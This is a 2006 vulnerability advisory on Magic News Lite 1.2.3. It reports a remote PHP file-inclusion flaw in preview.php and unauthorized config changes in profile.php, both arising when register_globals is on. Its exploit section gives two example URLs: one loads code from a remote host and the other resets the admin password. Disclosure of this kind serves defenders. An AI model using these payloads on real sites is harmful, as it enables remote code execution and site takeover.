EV0072.txt

`New eVuln Advisory:  
Magic News Lite PHP Code Execution & Unauthorized Data Modification  
http://evuln.com/vulns/72/summary.html  
  
--------------------Summary----------------  
eVuln ID: EV0072  
CVE: CVE-2006-0723 CVE-2006-0724  
Vendor: Reamday Enterprises  
Vendor's Web Site: http://reamdaysoft.com  
Software: Magic News Lite  
Sowtware's Web Site: http://reamdaysoft.com/customers/magic-news-lite/download.html  
Versions: 1.2.3  
Critical Level: Dangerous  
Type: Multiple Vulnerabilities  
Class: Remote  
Status: Unpatched. No reply from developer(s)  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
-----------------Description---------------  
1. PHP Code Execution  
  
Vulnerable script: preview.php  
  
Variable $php_script_path is not initialized before being used in include(). This can be used to execute arbitrary php code.  
  
Condition: register_globals = ON  
  
  
2. Unauthorized Data Modification  
  
Vulnerable script: profile.php  
  
Variables $action $passwd $admin_password $new_passwd $confirm_passwd are not initialized and their values can be replaced by user-defined data. This can be used to make unauthorized modifications in config.php  
  
Condition: register_globals = ON  
  
  
--------------Exploit----------------------  
Available at: http://evuln.com/vulns/72/exploit.html  
  
1. PHP Code Execution Example  
  
http://host/path/preview.php? php_script_path=http://remotehost/lib.php  
  
  
2. Unauthorized Data Modification Example  
  
http://host/path/profile.php? action=change&passwd=1&admin_password=1&new_passwd=new&confirm_passwd=new  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit-----------------------  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
  
Regards,  
Aliaksandr Hartsuyeu  
http://evuln.com - Penetration Testing Services  
.  
`